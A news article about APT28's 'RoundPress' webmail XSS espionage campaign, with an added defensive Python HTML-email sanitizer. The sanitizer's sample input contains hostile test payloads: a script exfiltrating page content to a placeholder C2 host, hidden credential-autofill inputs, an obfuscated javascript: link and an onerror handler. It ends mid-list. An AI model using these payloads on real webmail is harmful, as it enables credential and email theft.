Government webmail hacked via XSS bugs in global spy campaign

Computer Forensic | joe h | May 18, 2025


Hackers are running a worldwide cyberespionage campaign dubbed ‘RoundPress,’ leveraging zero-day and n-day flaws in webmail servers to steal email from high-value government organizations.

ESET researchers who uncovered the operation attribute it with medium confidence to the Russian state-sponsored hackers APT28 (aka “Fancy Bear” or “Sednit”).

The campaign started in 2023 and continued with the adoption of new exploits in 2024, targeting Roundcube, Horde, MDaemon, and Zimbra.

Notable targets include governments in Greece, Ukraine, Serbia, and Cameroon, military units in Ukraine and Ecuador, defense companies in Ukraine, Bulgaria, and Romania, and critical infrastructure in Ukraine and Bulgaria.

RoundPress targets
Source: ESET

Digital Forensics: Open email, have data stolen

The attack starts with a spear-phishing email referencing current news or political events, often including excerpts from news articles to add legitimacy.

A malicious JavaScript payload embedded in the HTML body of the email triggers a cross-site scripting (XSS) vulnerability in the webmail page rendered by the recipient's browser, so the script runs with the victim's authenticated webmail session.

All the victim needs to do is open the email to view it: no further clicks, redirections, or data input are required for the malicious JavaScript to execute.

Attack chain overview
Source: ESET

The payload has no persistence mechanisms, so it only executes when the malicious email is opened.

The script creates invisible input fields to trick browsers or password managers into autofilling stored credentials for the victim’s email accounts.

Credential stealer function
Source: ESET

Additionally, it reads the DOM or sends HTTP requests to the webmail server to collect email message content, contacts, webmail settings, login history, two-factor authentication data, and passwords.

The data is then exfiltrated to hardcoded command-and-control (C2) addresses using HTTP POST requests.

Each script has a slightly different set of capabilities, adjusted for the product it’s targeting.
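Every technique described above (script in the HTML body, hidden inputs for autofill, DOM and HTTP collection, POST exfiltration) depends on attacker-controlled HTML being rendered inside the authenticated webmail origin. The following is an added example, not ESET's research code and not any webmail vendor's sanitizer, of an allowlist sanitizer for untrusted HTML email bodies that also reports what it stripped. The sample message, the `.invalid` hosts in it, and all function and constant names are constructed for this demonstration.

```python
"""Allowlist sanitizer for untrusted HTML email bodies (added example, not
code from ESET or any webmail vendor).  A webmail client that renders
attacker-supplied HTML inside its own origin must reduce it to a known-safe
subset first; what gets dropped doubles as a triage signal for a reviewer."""
from __future__ import annotations

import html
import re
from html.parser import HTMLParser

# Tags that may survive, together with their text content.
ALLOWED_TAGS = {
    "p", "br", "b", "i", "u", "strong", "em", "a", "img", "div", "span",
    "table", "tr", "td", "th", "ul", "ol", "li", "blockquote",
    "h1", "h2", "h3", "h4", "h5", "h6",
}
# Per-tag attribute allowlist; anything else (style, class, id, ...) is dropped.
ALLOWED_ATTRS = {
    "a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
    "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"},
}
# Removed together with everything inside them.  Forms and inputs are here
# because hidden input fields are what password-manager autofill abuse needs.
DROP_WITH_CONTENT = {
    "script", "style", "form", "input", "textarea", "select", "button",
    "iframe", "object", "embed", "svg", "math", "template", "meta", "link", "base",
}
# Void elements never get a closing tag, so they must not be tracked as "open".
HTML_VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input", "link",
             "meta", "param", "source", "track", "wbr"}
SAFE_SCHEMES = {"http", "https", "mailto", "cid"}
_SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")


def url_is_safe(value: str) -> bool:
    """Accept relative URLs and SAFE_SCHEMES; reject javascript:, data:, vbscript:
    even when disguised with whitespace, control characters or mixed case
    (character references were already decoded by the parser)."""
    cleaned = "".join(c for c in value if c.isprintable() and not c.isspace()).lower()
    match = _SCHEME_RE.match(cleaned)
    if match is None:
        return True  # no scheme: relative URL, resolved against the webmail origin
    return match.group(1) in SAFE_SCHEMES


class EmailHtmlSanitizer(HTMLParser):
    """Serialises an allowlisted subset of the input and records what it removed."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.findings: list[tuple[str, str]] = []
        self._dropping: list[str] = []  # open tags inside a dropped subtree

    def handle_starttag(self, tag: str, attrs) -> None:
        if tag in DROP_WITH_CONTENT:
            self.findings.append(("dropped_tag", tag))
        if self._dropping or tag in DROP_WITH_CONTENT:
            if tag not in HTML_VOID:
                self._dropping.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown tag removed; its text content is kept
        kept = []
        for name, value in attrs:  # HTMLParser already lowercases names
            value = value or ""
            if name.startswith("on"):
                self.findings.append(("event_handler", f"{tag}@{name}"))
                continue
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name in ("href", "src") and not url_is_safe(value):
                self.findings.append(("unsafe_url", f"{tag}@{name}={value!r}"))
                continue
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag: str) -> None:
        if self._dropping:
            if tag in self._dropping:
                while self._dropping.pop() != tag:  # tolerate unclosed inner tags
                    pass
            return
        if tag in ALLOWED_TAGS and tag not in HTML_VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data: str) -> None:
        # Text is re-escaped on output; comments, doctypes and processing
        # instructions hit HTMLParser's default no-op handlers and vanish.
        if not self._dropping:
            self.out.append(html.escape(data, quote=False))


def sanitize_email_html(body: str) -> tuple[str, list[tuple[str, str]]]:
    """Return (clean_html, findings) for an untrusted HTML email body."""
    parser = EmailHtmlSanitizer()
    parser.feed(body)
    parser.close()
    return "".join(parser.out), parser.findings


# Constructed sample mimicking the techniques described above: inline script,
# hidden credential inputs, a disguised javascript: link and an event-handler
# attribute.  The .invalid hosts are placeholders, not indicators from ESET.
SAMPLE_EMAIL_HTML = (
    "<p>Excerpt from today's news...</p>"
    "<script>fetch('https://c2.invalid/x', {method: 'POST', body: document.body.innerHTML});</script>"
    '<form action="https://c2.invalid/login">'
    '<input type="text" name="user" style="display:none">'
    '<input type="password" name="pass" style="display:none"></form>'
    '<a href="java&#9;script:alert(1)">Read more</a>'
    '<img src="https://news.invalid/photo.jpg" onerror="alert(1)">'
    "<b>Regards</b>"
)

if __name__ == "__main__":
    clean, findings = sanitize_email_html(SAMPLE_EMAIL_HTML)
    print(clean)
    for kind, detail in findings:
        print(f"{kind}: {detail}")
```

Two design choices matter here. Dangerous elements are removed with their content rather than just unwrapped, so a `<form>` full of hidden inputs leaves nothing behind, and URL attributes are checked after the parser has decoded character references and after whitespace and control characters are stripped, since `java&#9;script:` is a classic bypass of a naive prefix check. In production, prefer the maintained sanitizer of your webmail platform (or a library such as DOMPurify on the client side) over a hand-rolled allowlist, but keep the finding log: a message whose sanitization report contains hidden inputs or event handlers is exactly the kind of artifact this campaign leaves behind.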

Digital Forensics: Vulnerabilities targeted

Operation RoundPress exploited multiple XSS flaws in webmail products commonly used by high-value organizations to inject its malicious JavaScript.

ESET associates the following flaws with the campaign:

  • Roundcube – CVE-2020-35730: A stored XSS flaw the hackers used in 2023, by embedding JavaScript directly into the body of an email. When victims opened the email in a browser-based webmail session, the script executed in their context, enabling credential and data theft.
  • Roundcube – CVE-2023-43770: An XSS vulnerability in how Roundcube handled hyperlink text leveraged in early 2024. Improper sanitization allowed attackers to inject